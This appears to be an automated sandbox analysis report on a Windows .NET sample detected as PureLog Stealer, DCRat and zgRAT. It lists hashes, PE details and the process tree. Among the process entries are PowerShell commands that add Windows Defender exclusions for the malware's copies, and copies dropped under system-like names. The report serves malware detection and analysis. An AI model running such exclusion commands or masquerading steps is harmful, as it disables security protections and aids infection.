SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.935662124001746
Encrypted:	false
SSDEEP:	48:6+pDPtuM7Jt8Bs3FJsdcV4MKe277dKOvqBHmOulajfqXSfbNtm:5PtPc+Vx9MvvkAcjRzNt
MD5:	A3F38139DDDDFA4D212F7A57F1659E07
SHA1:	7D5080BB2B3952823CA6E5F54B7DE9744D5BD87F
SHA-256:	48B9E1B2B1DBFA008E6E8A253C8D31C4BA3317537C25E3D3C7EE51A46D251B18
SHA-512:	DB54A2D4FD2AD917822194AA7FED332FF08631EA894D56E5A59342AF9983B04D48C2080841399DBC6ED605C5447D3C541C8CA6D9552C30F5E494164F4FDC22C6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................D'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.835119073378729
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXEpBCTW9XfRTWINvoPVRRJ8XKNvj:Vx993DEUDITWVRTW79e8
MD5:	236C9FFD9A70837F7C1EF484C1A71729
SHA1:	145AC9ADF85A160F1E4E765404650053EB922E5F
SHA-256:	4E0FD3818F624E1C35E6081CF380EFB0699D91C2FC87C574E16E799D25813622
SHA-512:	68F730EBC4131C7CE347A4B9AB6F7EDD6B391D96BF15B5BBE566807D97BABDA8849462930AECBA6FD5A094DE924BFD6DB075BD09EDB2BD175DA647D78C561CA0
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 04/10/2024 12:46:39..12:46:39, error: 0x80072746.12:46:44, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.574057459515473
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	fdsN8iw6WG.exe
File size:	2'033'664 bytes
MD5:	6fb0f1b7e1e962c770ef34e605d1c4ce
SHA1:	a314d67a1383ba7042b9f5f1d513f4d9177dff35
SHA256:	32058aa91a7e956ae9b48f8ef08ed82c35063d4443d018369c45822da3c9ba03
SHA512:	2e74e56c7aebbe4b6bdfd6f96da72db8c8b017ff1995151204b7cddb09745a7a5b2c26c35b56e33fc32ae4d5373c197967ae5ff65efd9809f520fbd55d1f3ae3
SSDEEP:	49152:t6Hwdqjo3Qo8D/30xTAprHEgLUabY1+oiPE:tHqQk/30tAVHLLLb6i
TLSH:	7595BE1A56918E37C2645B3148AB003D42A4D7363966FF0F391F21A66D13BB9CFB21B7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5f1dfe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F2F1FD [Tue Sep 24 17:08:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f1db0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1f2000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1f4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1efe04	0x1f0000	5c0ce93e5000fe302abbd53dc8fcb1cd	False	0.7911490163495464	data	7.577310772845179	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1f2000	0x320	0x400	f8e4f77971397f5c64b6f1e0d1cf83e1	False	0.3515625	data	2.6502033736331296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1f4000	0xc	0x200	ffb72d1e92330456917fbc25286b3260	False	0.041015625	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\037"	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1f2058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Target ID:	0
Start time:	11:15:52
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\fdsN8iw6WG.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\fdsN8iw6WG.exe"
Imagebase:	0xb50000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2119928328.0000000000B52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2282454452.000000001306D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:15:59
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline"
Imagebase:	0x7ff7611b0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:15:59
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:15:59
Start date:	04/10/2024
Path:	C:\Program Files\Microsoft\sihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft\sihost.exe"
Imagebase:	0x7b0000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\sihost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:15:59
Start date:	04/10/2024
Path:	C:\Program Files\Microsoft\sihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft\sihost.exe"
Imagebase:	0xd90000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:15:59
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34F8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP"
Imagebase:	0x7ff7b2010000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:15:59
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline"
Imagebase:	0x7ff7611b0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:16:00
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:16:00
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38D0.tmp" "c:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP"
Imagebase:	0x7ff7b2010000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:16:01
Start date:	04/10/2024
Path:	C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Imagebase:	0x980000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Imagebase:	0x220000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: fdsN8iw6WG.exePID: 5748, Parent PID: 1068

General

Target ID:	39
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\fdsN8iw6WG.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\fdsN8iw6WG.exe
Imagebase:	0x510000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fdsN8iw6WG.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:16:03
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	11:16:04
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	11:16:04
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	11:16:04
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\fdsN8iw6WG.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\fdsN8iw6WG.exe
Imagebase:	0xd10000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	11:16:04
Start date:	04/10/2024
Path:	C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
Imagebase:	0xe10000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	11:16:04
Start date:	04/10/2024
Path:	C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
Imagebase:	0xe0000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	11:16:05
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat"
Imagebase:	0x7ff749260000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	11:16:05
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	11:16:06
Start date:	04/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7c0b70000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	11:16:08
Start date:	04/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff795e10000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	11:16:13
Start date:	04/10/2024
Path:	C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Imagebase:	0x40000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	11:16:14
Start date:	04/10/2024
Path:	C:\Program Files\Microsoft\sihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft\sihost.exe"
Imagebase:	0x360000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	11:16:22
Start date:	04/10/2024
Path:	C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Imagebase:	0xbb0000
File size:	2'033'664 bytes
MD5 hash:	6FB0F1B7E1E962C770EF34E605D1C4CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	11:16:43
Start date:	04/10/2024
